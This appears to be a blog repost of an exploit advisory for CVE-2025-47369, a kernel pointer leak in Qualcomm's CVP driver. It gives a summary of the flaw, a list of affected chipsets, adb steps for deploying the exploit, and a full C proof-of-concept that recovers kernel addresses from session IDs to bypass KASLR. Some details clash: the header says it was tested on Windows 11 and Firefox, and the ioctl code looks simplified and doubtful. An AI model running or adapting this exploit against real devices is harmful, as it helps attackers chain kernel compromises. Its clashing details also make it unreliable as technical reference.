Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Qualcomm CVP Kernel Pointer Leak

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 17
Qualcomm CVP Kernel Pointer Leak
Qualcomm CVP Kernel Pointer Leak
Qualcomm CVP Kernel Pointer Leak

=============================================================================================================================================
| # Title Qualcomm CVP Kernel Pointer Leak

=============================================================================================================================================
| # Title : Kernel Pointer Leak via CVP Driver |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213733/ & CVE-2025-47369

[+] Summary : The Qualcomm CVP driver exposes kernel pointers to userland by returning a ?hashed? session ID derived from a kernel pointer using hash32_ptr().
This function is not a cryptographic hash but a reversible fold that XORs the upper and lower 32 bits of the pointer.
Due to predictable ARM64 kernel virtual address layout and alignment constraints, the session ID can be deterministically ?unfolded? to recover the original kernel pointer.
This design flaw results in a reliable kernel pointer leak, effectively bypassing KASLR and providing a strong info?leak primitive that can be chained with other vulnerabilities.
The issue is tracked as CVE?2025?47369 and stems from improper use of pointer-derived identifiers rather than an implementation bug.

[+] Affected Chipsets : AR8035, AR9380, CSR8811, FastConnect 6200, FastConnect 6700, FastConnect 6900, FastConnect 7800, Immersive Home 214 Platform,
Immersive Home 216 Platform, Immersive Home 316 Platform, Immersive Home 318 Platform, IPQ4018, IPQ4019, IPQ4028, IPQ4029, IPQ5010,
IPQ5028, IPQ6000, IPQ6010, IPQ6018, IPQ6028, IPQ8064, IPQ8065, IPQ8068, IPQ8070, IPQ8070A, IPQ8071, IPQ8071A, IPQ8072, IPQ8072A,
IPQ8074, IPQ8074A, IPQ8076, IPQ8076A, IPQ8078, IPQ8078A, IPQ8173, IPQ8174, QAM8255P, QAM8295P, QAM8620P, QAM8650P, QAM8775P, QAMSRV1H,
QAMSRV1M, QCA4024, QCA6174A, QCA6428, QCA6438, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6678AQ, QCA6688AQ,
QCA6696, QCA6698AQ, QCA6797AQ, QCA7500, QCA8075, QCA8081, QCA8337, QCA9880, QCA9886, QCA9888, QCA9889, QCA9898, QCA9980, QCA9984,
QCA9985, QCA9986, QCA9990, QCA9992, QCA9994, QCC710, QCM5430, QCM6490, QCN5022, QCN5024, QCN5052, QCN5122, QCN5124, QCN5152, QCN5154,
QCN5164, QCN6023, QCN6024, QCN6112, QCN6122, QCN6132, QCN6224, QCN6274, QCN9000, QCN9022, QCN9024, QCN9070, QCN9072, QCN9074, QCN9100,
QCN9274, QCS5430, QCS615, QCS6490, QCS9100, QEP8111, QFW7114, QFW7124, QMP1000, Qualcommr Video Collaboration VC3 Platform, SA6145P,
SA6150P, SA6155P, SA7255P, SA7775P, SA8145P, SA8150P, SA8155P, SA8195P, SA8255P, SA8295P, SA8540P, SA8620P, SA8650P, SA8770P, SA8775P,
SA9000P, SC8380XP, SDX55, SM4635, SM6475, SM6650, SM6650P, SM7435, SM7635, SM7635P, SM7675, SM7675P, SM8635, SM8635P, SM8650Q, SM8735,
SM8750, SM8750P, Snapdragon 4 Gen 2 Mobile Platform, Snapdragon 6 Gen 1 Mobile Platform, Snapdragon 8 Gen 3 Mobile Platform, Snapdragon
AR1 Gen 1 Platform, Snapdragon AR1 Gen 1 Platform "Luna1", Snapdragon Auto 5G Modem-RF Gen 2, Snapdragon X32 5G Modem-RF System,
Snapdragon X35 5G Modem-RF System, Snapdragon X72 5G Modem-RF System, Snapdragon X75 5G Modem-RF System, SRV1H, SRV1L, SRV1M, SXR2330P,
SXR2350P, WCD9340, WCD9370, WCD9375, WCD9378, WCD9380, WCD9385, WCD9390, WCD9395,
WCN3950, WCN3988, WCN6650, WCN6755, WCN7750, WCN7860, WCN7861, WCN7880, WCN7881,
WSA8810, WSA8815, WSA8830, WSA8832, WSA8835, WSA8840, WSA8845, WSA8845H
[+] Usage :

# 1. Compile the POC : gcc -o cvp_exploit cvp_exploit.c -static

# 2. Upload the file to the machine : adb push cvp_exploit /data/local/tmp/

# 3. Run the exploit :

adb shell
cd /data/local/tmp
chmod +x cvp_exploit
./cvp_exploit

[+] POC :

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <stdint.h>

#define EVA_KMD_SESSION_CONTROL 1
#define EVA_KMD_GET_SESSION_INFO 2
#define SESSION_CREATE 1

struct session_ctrl_data {
int ctrl_type;

};

struct session_info_data {
unsigned int session_id;

};

struct eva_kmd_arg {
int type;
union {
struct session_ctrl_data session_ctrl;
struct session_info_data session;

} data;
};

unsigned long unfold_pointer(unsigned int session_id) {


unsigned char bottom_byte = (session_id & 0xf) | 0x80;

unsigned long top_half = 0xffffff00UL | bottom_byte;

unsigned long bottom_half = session_id ^ (top_half & 0xffffffff);

unsigned long kernel_ptr = (top_half << 32) | bottom_half;

return kernel_ptr;
}

int is_valid_kernel_pointer(unsigned long ptr) {

if ((ptr >> 63) == 1) {
return 1;
}

if ((ptr >> 48) == 0xffffff) {
return 1;
}

return 0;
}

int main(int argc, char *argv[]) {
printf("CVE-2025-47369 POC - Kernel Pointer Leak via CVP Driver by indoushka\n");
printf("=====================================================================\n");

int fd = open("/dev/cvp", O_RDWR);
if (fd == -1) {
perror("Failed to open /dev/cvp");
printf("Make sure device exists and permissions are correct\n");
return EXIT_FAILURE;
}
printf("[+] Opened /dev/cvp (fd=%d)\n", fd);


int num_sessions = 3;
unsigned long pointers[num_sessions];

for (int i = 0; i < num_sessions; i++) {

struct eva_kmd_arg create_arg = {
.type = EVA_KMD_SESSION_CONTROL,
.data.session_ctrl.ctrl_type = SESSION_CREATE,
};

if (ioctl(fd, 0, &create_arg) < 0) {
perror("Failed to create session");
close(fd);
return EXIT_FAILURE;
}

struct eva_kmd_arg info_arg = {
.type = EVA_KMD_GET_SESSION_INFO,
.data.session.session_id = 0
};

if (ioctl(fd, 0, &info_arg) < 0) {
perror("Failed to get session info");
close(fd);
return EXIT_FAILURE;
}

unsigned int session_id = info_arg.data.session.session_id;
printf("[+] Session %d created - session_id: 0x%08x\n",
i + 1, session_id);

unsigned long kernel_ptr = unfold_pointer(session_id);
pointers[i] = kernel_ptr;

if (is_valid_kernel_pointer(kernel_ptr)) {
printf(" [+] Leaked kernel pointer: 0x%016lx\n", kernel_ptr);

printf(" [+] Pointer analysis:\n");
printf(" - Upper 32 bits: 0x%08lx\n", kernel_ptr >> 32);
printf(" - Lower 32 bits: 0x%08lx\n", kernel_ptr & 0xffffffff);
printf(" - XOR result: 0x%08x\n",
(unsigned int)((kernel_ptr >> 32) ^ (kernel_ptr & 0xffffffff)));
} else {
printf(" [-] Invalid/unexpected pointer format: 0x%016lx\n",
kernel_ptr);
}

printf("\n");
}

printf("[+] Pattern Analysis:\n");
for (int i = 1; i < num_sessions; i++) {
long diff = pointers[i] - pointers[i-1];
printf(" Difference between session %d and %d: %ld bytes (0x%lx)\n",
i, i - 1, diff, diff);
}

printf("\n[+] System Information:\n");
printf(" Pointer size: %lu bits\n", sizeof(void*) * 8);
printf(" Long size: %lu bits\n", sizeof(unsigned long) * 8);

close(fd);
printf("[+] Exploit completed successfully\n");

return EXIT_SUCCESS;
}

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

Social Media Share